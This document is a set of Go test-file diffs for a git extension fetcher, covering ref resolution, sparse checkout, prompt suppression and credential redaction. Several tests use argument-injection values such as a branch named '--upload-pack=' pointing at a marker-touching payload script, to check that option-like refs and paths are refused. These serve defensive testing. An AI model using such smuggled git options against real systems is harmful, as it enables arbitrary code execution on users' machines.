-	// path that passed normalizeSubpath and a leading-"-" check in
-	// Materialize; no caller-controlled value reaches git unvalidated.
+	// leading "-" and git's other unsafe ref characters), one of those three
+	// under a fixed prefix or "^{...}" suffix, or a repository path that passed
+	// normalizeSubpath and a leading-"-" check in Materialize; no
+	// caller-controlled value reaches git unvalidated.
 	cmd := exec.CommandContext(ctx, f.git, full...)
 	cmd.Dir = dir
 	var stdoutBuf, stderrBuf bytes.Buffer

--- a/internal/extinstall/fetch_test.go
+++ b/internal/extinstall/fetch_test.go
@@ -98,6 +98,54 @@ func TestGitFetcherResolveRefDefaultHead(t *testing.T) {
 	}
 }
 
+// TestParseSymrefHeadIgnoresRemoteTrackingHead covers a local clone as a
+// source. Such a repository advertises refs/remotes/origin/HEAD next to its
+// own HEAD, and only the latter says which branch to follow: pinning to
+// refs/remotes/origin/<branch> records a ref no later fetch can resolve, and
+// tracks a stale copy rather than the branch that moves.
+func TestParseSymrefHeadIgnoresRemoteTrackingHead(t *testing.T) {
+	out := strings.Join([]string{
+		"ref: refs/heads/main\tHEAD",
+		"69dd41f035711f42971f17f29d4b59986700ec2a\tHEAD",
+		"ref: refs/remotes/origin/main\trefs/remotes/origin/HEAD",
+		"8f0bbc7b0db8fe144e01f5af23e331bc7adbb922\trefs/remotes/origin/HEAD",
+	}, "\n")
+
+	got, err := parseSymrefHead(out, "/tmp/clone")
+	if err != nil {
+		t.Fatalf("parseSymrefHead: %v", err)
+	}
+	if got.Ref != "main" {
+		t.Errorf("ref = %q, want the branch the repository's own HEAD names", got.Ref)
+	}
+	if got.Commit != "69dd41f035711f42971f17f29d4b59986700ec2a" {
+		t.Errorf("commit = %q, want HEAD's commit, not the tracking ref's", got.Commit)
+	}
+}
+
+// TestGitFetcherResolveRefFromLocalClone is the end-to-end counterpart: a
+// clone of a clone still resolves to the branch it is actually on.
+func TestGitFetcherResolveRefFromLocalClone(t *testing.T) {
+	origin := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	clone := filepath.Join(t.TempDir(), "clone")
+	runGitFixture(t, "", "clone", "--quiet", origin, clone)
+
+	got, err := fetcher.ResolveRef(context.Background(), clone, "")
+	if err != nil {
+		t.Fatalf("ResolveRef: %v", err)
+	}
+	if got.Ref != "main" {
+		t.Fatalf("ref = %q, want main", got.Ref)
+	}
+	if got.RefType != RefTypeBranch {
+		t.Fatalf("refType = %q, want branch", got.RefType)
+	}
+}
+
 func TestGitFetcherResolveRefTagAndCommit(t *testing.T) {
 	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
 	runGitFixture(t, repo, "tag", "v1.0.0")

--- a/internal/extinstall/fetch_test.go
+++ b/internal/extinstall/fetch_test.go
@@ -60,9 +60,33 @@ func boolString(value bool) string {
 	return "false"
 }
 
+// TestGitFetcherEnvGovernsTerminalPrompts covers the credential prompt: git
+// reads it from /dev/tty, so a run reporting into a JSON envelope would block
+// on a question nobody sees.
+func TestGitFetcherEnvGovernsTerminalPrompts(t *testing.T) {
+	// An inherited value would make both halves of this meaningless: exec keeps
+	// the last occurrence of a variable, so the assertions are about what env
+	// appends, not about what the developer's shell happens to export.
+	t.Setenv("GIT_TERMINAL_PROMPT", "1")
+	t.Setenv("GIT_ASKPASS", "/usr/bin/some-dialog")
+
+	quiet := &gitFetcher{git: "git"}
+	for _, want := range []string{"GIT_TERMINAL_PROMPT=0", "GIT_ASKPASS="} {
+		if !slices.Contains(quiet.env(), want) {
+			t.Errorf("%s missing: git may still ask for credentials in a run that cannot answer", want)
+		}
+	}
+	asking := &gitFetcher{git: "git", allowPrompts: true}
+	for _, unwanted := range []string{"GIT_TERMINAL_PROMPT=0", "GIT_ASKPASS="} {
+		if slices.Contains(asking.env(), unwanted) {
+			t.Errorf("%s set: a user cannot answer a question git never asks", unwanted)
+		}
+	}
+}
+
 func TestGitFetcherResolveRefBranch(t *testing.T) {
 	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -81,7 +105,7 @@ func TestGitFetcherResolveRefBranch(t *testing.T) {
 
 func TestGitFetcherResolveRefDefaultHead(t *testing.T) {
 	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -123,11 +147,41 @@ func TestParseSymrefHeadIgnoresRemoteTrackingHead(t *testing.T) {
 	}
 }
 
+// TestGitFetcherResolveRefFromDetachedClone covers a source whose HEAD names no
+// branch, which a local clone parked on a tag or a commit does. There is no
+// branch to follow, so the install pins the commit: recording a ref named
+// "HEAD" would leave every later update looking for a branch or tag of that
+// name, which no ls-remote can ever match.
+func TestGitFetcherResolveRefFromDetachedClone(t *testing.T) {
+	origin := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
+	fetcher, err := NewGitFetcher(false)
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	clone := filepath.Join(t.TempDir(), "clone")
+	runGitFixture(t, "", "clone", "--quiet", origin, clone)
+	runGitFixture(t, clone, "checkout", "--quiet", "--detach", "HEAD")
+
+	got, err := fetcher.ResolveRef(context.Background(), clone, "")
+	if err != nil {
+		t.Fatalf("ResolveRef: %v", err)
+	}
+	if got.RefType != RefTypeCommit {
+		t.Fatalf("refType = %q, want commit", got.RefType)
+	}
+	if got.Ref != got.Commit {
+		t.Fatalf("ref = %q, want the commit %q", got.Ref, got.Commit)
+	}
+	if _, err := fetcher.ResolveRef(context.Background(), clone, got.Ref); err != nil {
+		t.Fatalf("the recorded ref does not resolve again: %v", err)
+	}
+}
+
 // TestGitFetcherResolveRefFromLocalClone is the end-to-end counterpart: a
 // clone of a clone still resolves to the branch it is actually on.
 func TestGitFetcherResolveRefFromLocalClone(t *testing.T) {
 	origin := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -149,7 +203,7 @@ func TestGitFetcherResolveRefFromLocalClone(t *testing.T) {
 func TestGitFetcherResolveRefTagAndCommit(t *testing.T) {
 	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
 	runGitFixture(t, repo, "tag", "v1.0.0")
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -176,7 +230,7 @@ func TestGitFetcherOpenListsFilesWithoutMaterializing(t *testing.T) {
 		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
 		"website/big.txt":                   "unrelated\n",
 	})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -203,7 +257,7 @@ func TestGitFetcherMaterializeSubset(t *testing.T) {
 		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
 		"website/big.txt":                   "unrelated\n",
 	})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -237,7 +291,7 @@ func TestGitFetcherMaterializeHonorsContext(t *testing.T) {
 	repo := fixtureRepo(t, true, map[string]string{
 		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
 	})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -260,7 +314,7 @@ func TestGitFetcherMaterializeHonorsContext(t *testing.T) {
 func TestGitFetcherListsQuotedPathsVerbatim(t *testing.T) {
 	const spec = "extensions/features/日本/spec.yaml"
 	repo := fixtureRepo(t, true, map[string]string{spec: "schemaVersion: \"1\"\nkind: mixin\nname: foo\n"})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -280,7 +334,7 @@ func TestGitFetcherFallsBackWhenFilterUnsupported(t *testing.T) {
 		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
 		"website/big.txt":                   "unrelated\n",
 	})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -318,7 +372,7 @@ func TestGitFetcherFallsBackWhenFilterUnsupported(t *testing.T) {
 
 func TestGitFetcherOpenUnknownRef(t *testing.T) {
 	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -351,7 +405,7 @@ func TestGitFetcherRejectsOptionLikeRemoteHead(t *testing.T) {
 	runGitFixture(t, repoDir, "add", "-A")
 	runGitFixture(t, repoDir, "commit", "-qm", "initial")
 
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -368,7 +422,7 @@ func TestGitFetcherRejectsOptionLikeRemoteHead(t *testing.T) {
 // untrusted ref reaches git as a bare operand: an explicit --ref value.
 func TestGitFetcherRejectsOptionLikeRequestedRef(t *testing.T) {
 	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -383,7 +437,7 @@ func TestGitFetcherMaterializeRejectsOptionLikePath(t *testing.T) {
 	repo := fixtureRepo(t, true, map[string]string{
 		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
 	})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -410,7 +464,7 @@ func TestGitRepoFetchPinnedCommitFromDefaultBranch(t *testing.T) {
 	runGitFixture(t, src, "add", "-A")
 	runGitFixture(t, src, "commit", "-qm", "second")
 
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -452,7 +506,7 @@ func TestGitRepoFetchPinnedCommitFromDefaultBranch(t *testing.T) {
 // default branch.
 func TestGitRepoFetchPinnedCommitFromDefaultBranchMissing(t *testing.T) {
 	src := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}

--- a/internal/extinstall/fetch_test.go
+++ b/internal/extinstall/fetch_test.go
@@ -1,0 +1,425 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"context"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"slices"
+	"strings"
+	"testing"
+)
+
+// runGitFixture executes git in dir and fails the test on error.
+func runGitFixture(t *testing.T, dir string, args ...string) string {
+	t.Helper()
+	cmd := exec.Command("git", args...)
+	cmd.Dir = dir
+	cmd.Env = append(os.Environ(),
+		"GIT_AUTHOR_NAME=Test", "GIT_AUTHOR_EMAIL=test@example.com",
+		"GIT_COMMITTER_NAME=Test", "GIT_COMMITTER_EMAIL=test@example.com",
+	)
+	out, err := cmd.CombinedOutput()
+	if err != nil {
+		t.Fatalf("git %v: %v\n%s", args, err, out)
+	}
+	return string(out)
+}
+
+// fixtureRepo builds a real git repository with the given files and returns its
+// path. allowFilter controls uploadpack.allowFilter, so both the partial-fetch
+// path and its fallback can be exercised.
+func fixtureRepo(t *testing.T, allowFilter bool, files map[string]string) string {
+	t.Helper()
+	if _, err := exec.LookPath("git"); err != nil {
+		t.Skip("git not available")
+	}
+	dir := t.TempDir()
+	runGitFixture(t, dir, "init", "-q")
+	runGitFixture(t, dir, "symbolic-ref", "HEAD", "refs/heads/main")
+	for rel, content := range files {
+		writeFixture(t, filepath.Join(dir, filepath.FromSlash(rel)), content, 0o644)
+	}
+	runGitFixture(t, dir, "add", "-A")
+	runGitFixture(t, dir, "commit", "-qm", "initial")
+	runGitFixture(t, dir, "config", "uploadpack.allowFilter", boolString(allowFilter))
+	return dir
+}
+
+func boolString(value bool) string {
+	if value {
+		return "true"
+	}
+	return "false"
+}
+
+func TestGitFetcherResolveRefBranch(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+
+	got, err := fetcher.ResolveRef(context.Background(), repo, "main")
+	if err != nil {
+		t.Fatalf("ResolveRef: %v", err)
+	}
+	if len(got.Commit) != 40 {
+		t.Fatalf("commit = %q, want a full sha", got.Commit)
+	}
+	if got.Ref != "main" || got.RefType != RefTypeBranch {
+		t.Fatalf("ref = %q/%q", got.Ref, got.RefType)
+	}
+}
+
+func TestGitFetcherResolveRefDefaultHead(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+
+	got, err := fetcher.ResolveRef(context.Background(), repo, "")
+	if err != nil {
+		t.Fatalf("ResolveRef: %v", err)
+	}
+	if got.Ref != "main" {
+		t.Fatalf("ref = %q, want the branch HEAD points at", got.Ref)
+	}
+	if got.RefType != RefTypeBranch {
+		t.Fatalf("refType = %q, want branch", got.RefType)
+	}
+}
+
+func TestGitFetcherResolveRefTagAndCommit(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
+	runGitFixture(t, repo, "tag", "v1.0.0")
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+
+	tagRef, err := fetcher.ResolveRef(context.Background(), repo, "v1.0.0")
+	if err != nil {
+		t.Fatalf("ResolveRef(tag): %v", err)
+	}
+	if tagRef.RefType != RefTypeTag {
+		t.Fatalf("refType = %q, want tag", tagRef.RefType)
+	}
+
+	pinned, err := fetcher.ResolveRef(context.Background(), repo, tagRef.Commit)
+	if err != nil {
+		t.Fatalf("ResolveRef(sha): %v", err)
+	}
+	if pinned.RefType != RefTypeCommit || pinned.Commit != tagRef.Commit {
+		t.Fatalf("pinned = %+v", pinned)
+	}
+}
+
+func TestGitFetcherOpenListsFilesWithoutMaterializing(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{
+		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
+		"website/big.txt":                   "unrelated\n",
+	})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+
+	opened, err := fetcher.Open(context.Background(), repo, "main")
+	if err != nil {
+		t.Fatalf("Open: %v", err)
+	}
+	defer opened.Close()
+
+	if !slices.Contains(opened.Files(), "extensions/features/foo/spec.yaml") {
+		t.Fatalf("Files() = %v, want the spec path", opened.Files())
+	}
+	if !slices.Contains(opened.Files(), "website/big.txt") {
+		t.Fatalf("Files() = %v, want the full tree listing", opened.Files())
+	}
+	if len(opened.Commit()) != 40 {
+		t.Fatalf("Commit = %q", opened.Commit())
+	}
+}
+
+func TestGitFetcherMaterializeSubset(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{
+		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
+		"website/big.txt":                   "unrelated\n",
+	})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	opened, err := fetcher.Open(context.Background(), repo, "main")
+	if err != nil {
+		t.Fatalf("Open: %v", err)
+	}
+	defer opened.Close()
+
+	if err := opened.Materialize(context.Background(), []string{"extensions/features/foo"}); err != nil {
+		t.Fatalf("Materialize: %v", err)
+	}
+	if _, err := os.Stat(filepath.Join(opened.Dir(), "extensions", "features", "foo", "spec.yaml")); err != nil {
+		t.Fatalf("selected dir not materialized: %v", err)
+	}
+	// A regression that silently fell back to a full checkout would still
+	// produce the file above; only checking for its absence, and the sparse
+	// bookkeeping, proves the checkout was actually narrowed.
+	if _, err := os.Stat(filepath.Join(opened.Dir(), "website", "big.txt")); !os.IsNotExist(err) {
+		t.Fatalf("unrelated file present after Materialize: stat err = %v", err)
+	}
+	if repoImpl, ok := opened.(*gitRepo); !ok || !repoImpl.sparse {
+		t.Fatalf("sparse = %v (ok=%v), want true", ok && repoImpl.sparse, ok)
+	}
+}
+
+// TestGitFetcherMaterializeHonorsContext proves the checkout runs under the
+// caller's context, so cancelling an add or update stops it rather than letting
+// a full-repository checkout run to completion.
+func TestGitFetcherMaterializeHonorsContext(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{
+		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
+	})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	opened, err := fetcher.Open(context.Background(), repo, "main")
+	if err != nil {
+		t.Fatalf("Open: %v", err)
+	}
+	defer opened.Close()
+
+	ctx, cancel := context.WithCancel(context.Background())
+	cancel()
+	if err := opened.Materialize(ctx, []string{"extensions/features/foo"}); err == nil {
+		t.Fatal("Materialize succeeded under a cancelled context")
+	}
+}
+
+// TestGitFetcherListsQuotedPathsVerbatim covers git's default core.quotePath:
+// a path with non-ASCII bytes is C-quoted in ls-tree's line-oriented output, so
+// a listing parsed as plain lines would hide every extension below it.
+func TestGitFetcherListsQuotedPathsVerbatim(t *testing.T) {
+	const spec = "extensions/features/日本/spec.yaml"
+	repo := fixtureRepo(t, true, map[string]string{spec: "schemaVersion: \"1\"\nkind: mixin\nname: foo\n"})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	opened, err := fetcher.Open(context.Background(), repo, "main")
+	if err != nil {
+		t.Fatalf("Open: %v", err)
+	}
+	defer opened.Close()
+
+	if got := opened.Files(); len(got) != 1 || got[0] != spec {
+		t.Fatalf("Files() = %q, want [%q]", got, spec)
+	}
+}
+
+func TestGitFetcherFallsBackWhenFilterUnsupported(t *testing.T) {
+	repo := fixtureRepo(t, false, map[string]string{
+		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
+		"website/big.txt":                   "unrelated\n",
+	})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+
+	opened, err := fetcher.Open(context.Background(), repo, "main")
+	if err != nil {
+		t.Fatalf("Open with filters disabled: %v", err)
+	}
+	defer opened.Close()
+
+	repoImpl, ok := opened.(*gitRepo)
+	if !ok {
+		t.Fatalf("opened = %T, want *gitRepo", opened)
+	}
+	if repoImpl.blobless {
+		t.Fatal("blobless fetch reported success even though the server disallows object filters")
+	}
+
+	if err := opened.Materialize(context.Background(), []string{"extensions/features/foo"}); err != nil {
+		t.Fatalf("Materialize: %v", err)
+	}
+	if _, err := os.Stat(filepath.Join(opened.Dir(), "extensions", "features", "foo", "spec.yaml")); err != nil {
+		t.Fatalf("fallback path did not materialize: %v", err)
+	}
+	// The object-filter fallback and sparse checkout are independent
+	// mechanisms: losing the filter must not silently lose the sparse
+	// narrowing too.
+	if _, err := os.Stat(filepath.Join(opened.Dir(), "website", "big.txt")); !os.IsNotExist(err) {
+		t.Fatalf("unrelated file present after Materialize: stat err = %v", err)
+	}
+	if !repoImpl.sparse {
+		t.Fatal("sparse = false, want true: the filter fallback should not have degraded sparse checkout")
+	}
+}
+
+func TestGitFetcherOpenUnknownRef(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	if _, err := fetcher.ResolveRef(context.Background(), repo, "nope"); err == nil {
+		t.Fatal("ResolveRef accepted a missing ref")
+	}
+}
+
+// TestGitFetcherRejectsOptionLikeRemoteHead covers a remote-triggered
+// arbitrary-code-execution vector: a hostile repository can point its symbolic
+// HEAD at a branch named like a git command-line option (for example
+// "--upload-pack=/path/to/payload"), and if that name reaches "git
+// fetch" as a bare operand, git runs it as the upload-pack program. This is
+// the ordinary no-"--ref" install path (Open(ctx, remote, "")) against an
+// untrusted repository, so it must be refused before any fetch is attempted,
+// and the payload must never run.
+func TestGitFetcherRejectsOptionLikeRemoteHead(t *testing.T) {
+	if _, err := exec.LookPath("git"); err != nil {
+		t.Skip("git not available")
+	}
+	markerDir := t.TempDir()
+	marker := filepath.Join(markerDir, "pwned")
+	payload := filepath.Join(markerDir, "payload.sh")
+	writeFixture(t, payload, "#!/bin/sh\ntouch "+marker+"\n", 0o755)
+
+	repoDir := t.TempDir()
+	runGitFixture(t, repoDir, "init", "-q")
+	runGitFixture(t, repoDir, "symbolic-ref", "HEAD", "refs/heads/--upload-pack="+payload)
+	writeFixture(t, filepath.Join(repoDir, "README.md"), "hi\n", 0o644)
+	runGitFixture(t, repoDir, "add", "-A")
+	runGitFixture(t, repoDir, "commit", "-qm", "initial")
+
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+
+	if _, err := fetcher.Open(context.Background(), repoDir, ""); err == nil {
+		t.Fatal("Open accepted a remote HEAD naming an option-like branch")
+	}
+	if _, statErr := os.Stat(marker); !os.IsNotExist(statErr) {
+		t.Fatalf("payload executed despite the rejection: marker stat err = %v", statErr)
+	}
+}
+
+// TestGitFetcherRejectsOptionLikeRequestedRef covers the second place an
+// untrusted ref reaches git as a bare operand: an explicit --ref value.
+func TestGitFetcherRejectsOptionLikeRequestedRef(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	if _, err := fetcher.ResolveRef(context.Background(), repo, "--upload-pack=/tmp/pwn.sh"); err == nil {
+		t.Fatal("ResolveRef accepted an option-like requested ref")
+	}
+}
+
+// TestGitFetcherMaterializeRejectsOptionLikePath covers the same class of
+// defect for Materialize's directory list.
+func TestGitFetcherMaterializeRejectsOptionLikePath(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{
+		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
+	})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	opened, err := fetcher.Open(context.Background(), repo, "main")
+	if err != nil {
+		t.Fatalf("Open: %v", err)
+	}
+	defer opened.Close()
+
+	if err := opened.Materialize(context.Background(), []string{"--upload-pack=/tmp/pwn.sh"}); err == nil {
+		t.Fatal("Materialize accepted an option-like path")
+	}
+}
+
+// TestGitRepoFetchPinnedCommitFromDefaultBranch exercises the third fallback
+// rung directly. git's local transport ignores the uploadpack.allow* settings
+// that would make these fixtures refuse a fetch-by-SHA, so the rung is entered
+// by hand, in the state Open leaves behind once the plain fetch-by-SHA has
+// failed: an initialized repo with "origin" added and nothing fetched yet.
+func TestGitRepoFetchPinnedCommitFromDefaultBranch(t *testing.T) {
+	src := fixtureRepo(t, true, map[string]string{"extensions/features/foo/spec.yaml": "v1\n"})
+	firstCommit := strings.TrimSpace(runGitFixture(t, src, "rev-parse", "HEAD"))
+	writeFixture(t, filepath.Join(src, "extensions", "features", "foo", "spec.yaml"), "v2\n", 0o644)
+	runGitFixture(t, src, "add", "-A")
+	runGitFixture(t, src, "commit", "-qm", "second")
+
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	gf, ok := fetcher.(*gitFetcher)
+	if !ok {
+		t.Fatalf("fetcher = %T, want *gitFetcher", fetcher)
+	}
+
+	dstDir := t.TempDir()
+	runGitFixture(t, dstDir, "init", "-q")
+	runGitFixture(t, dstDir, "remote", "add", "origin", src)
+
+	repo := &gitRepo{fetcher: gf, dir: dstDir, ref: RemoteRef{Commit: firstCommit, RefType: RefTypeCommit}}
+	if err := repo.fetchPinnedCommitFromDefaultBranch(context.Background(), repo.ref); err != nil {
+		t.Fatalf("fetchPinnedCommitFromDefaultBranch: %v", err)
+	}
+	if repo.checkoutTarget != firstCommit {
+		t.Fatalf("checkoutTarget = %q, want the pinned commit %q (not FETCH_HEAD, which update-ref cannot write)", repo.checkoutTarget, firstCommit)
+	}
+	if repo.ref.Commit != firstCommit {
+		t.Fatalf("ref.Commit = %q, want %q", repo.ref.Commit, firstCommit)
+	}
+
+	if err := repo.Materialize(context.Background(), []string{"extensions/features/foo"}); err != nil {
+		t.Fatalf("Materialize: %v", err)
+	}
+	content, err := os.ReadFile(filepath.Join(repo.Dir(), "extensions", "features", "foo", "spec.yaml"))
+	if err != nil {
+		t.Fatalf("read materialized file: %v", err)
+	}
+	if string(content) != "v1\n" {
+		t.Fatalf("content = %q, want the pinned first commit's content, not the branch tip's", content)
+	}
+}
+
+// TestGitRepoFetchPinnedCommitFromDefaultBranchMissing proves the fallback
+// reports a clear error instead of proceeding with a checkout target that
+// does not exist when the pinned commit is absent even after fetching the
+// default branch.
+func TestGitRepoFetchPinnedCommitFromDefaultBranchMissing(t *testing.T) {
+	src := fixtureRepo(t, true, map[string]string{"README.md": "hi\n"})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	gf, ok := fetcher.(*gitFetcher)
+	if !ok {
+		t.Fatalf("fetcher = %T, want *gitFetcher", fetcher)
+	}
+
+	dstDir := t.TempDir()
+	runGitFixture(t, dstDir, "init", "-q")
+	runGitFixture(t, dstDir, "remote", "add", "origin", src)
+
+	missing := strings.Repeat("f", 40)
+	repo := &gitRepo{fetcher: gf, dir: dstDir, ref: RemoteRef{Commit: missing, RefType: RefTypeCommit}}
+	if err := repo.fetchPinnedCommitFromDefaultBranch(context.Background(), repo.ref); err == nil {
+		t.Fatal("fetchPinnedCommitFromDefaultBranch accepted a commit absent from the default branch")
+	}
+}

--- a/internal/extinstall/fetch_test.go
+++ b/internal/extinstall/fetch_test.go
@@ -525,3 +525,55 @@ func TestGitRepoFetchPinnedCommitFromDefaultBranchMissing(t *testing.T) {
 		t.Fatal("fetchPinnedCommitFromDefaultBranch accepted a commit absent from the default branch")
 	}
 }
+
+// TestGitFetcherErrorRedactsRemoteInArgv covers the failing-command half of a
+// git error: the remote appears in the argv of ls-remote and `remote add`, not
+// only in git's stderr, and the error string ends up in the --json envelope.
+func TestGitFetcherErrorRedactsRemoteInArgv(t *testing.T) {
+	fetcher, err := NewGitFetcher(false)
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	// An unknown subcommand fails immediately and without a network round trip,
+	// while still carrying the remote through as an operand.
+	_, _, runErr := fetcher.(*gitFetcher).runCombined(context.Background(), t.TempDir(),
+		"definitely-not-a-git-subcommand", "https://user:s3cr3t@example.invalid/repo.git")
+	if runErr == nil {
+		t.Fatal("expected an error from an unknown git subcommand")
+	}
+	if strings.Contains(runErr.Error(), "s3cr3t") {
+		t.Fatalf("the error leaks the remote's credentials: %v", runErr)
+	}
+}
+
+// TestMaterializeAfterSparseSelectionRestoresFullTree covers the fetch cache
+// serving one repository to several extensions: a sparse cone set for the first
+// one must not truncate the checkout of a second that owns the whole tree.
+func TestMaterializeAfterSparseSelectionRestoresFullTree(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{
+		"spec.yaml":              "schemaVersion: \"1\"\nkind: mixin\nname: root\n",
+		"skills/review/SKILL.md": "root extension content\n",
+		"tools/alpha/spec.yaml":  "schemaVersion: \"1\"\nkind: sandbox\nname: alpha\n",
+	})
+	fetcher, err := NewGitFetcher(false)
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	opened, err := fetcher.Open(context.Background(), repo, "main")
+	if err != nil {
+		t.Fatalf("Open: %v", err)
+	}
+	defer opened.Close()
+
+	if err := opened.Materialize(context.Background(), []string{"tools/alpha"}); err != nil {
+		t.Fatalf("Materialize(subpath): %v", err)
+	}
+	// The repository root is an extension too, and no set of paths describes it,
+	// so it materializes with a full checkout.
+	if err := opened.Materialize(context.Background(), nil); err != nil {
+		t.Fatalf("Materialize(root): %v", err)
+	}
+	if _, err := os.Stat(filepath.Join(opened.Dir(), "skills", "review", "SKILL.md")); err != nil {
+		t.Fatalf("the full checkout was reduced to the previous sparse cone: %v", err)
+	}
+}

--- a/internal/extinstall/fetch_test.go
+++ b/internal/extinstall/fetch_test.go
@@ -225,6 +225,89 @@ func TestGitFetcherResolveRefTagAndCommit(t *testing.T) {
 	}
 }
 
+// TestGitFetcherAnnotatedTagRecordsCommit covers an annotated tag as the
+// source ref. Its refs/tags/<name> line advertises the tag object, and
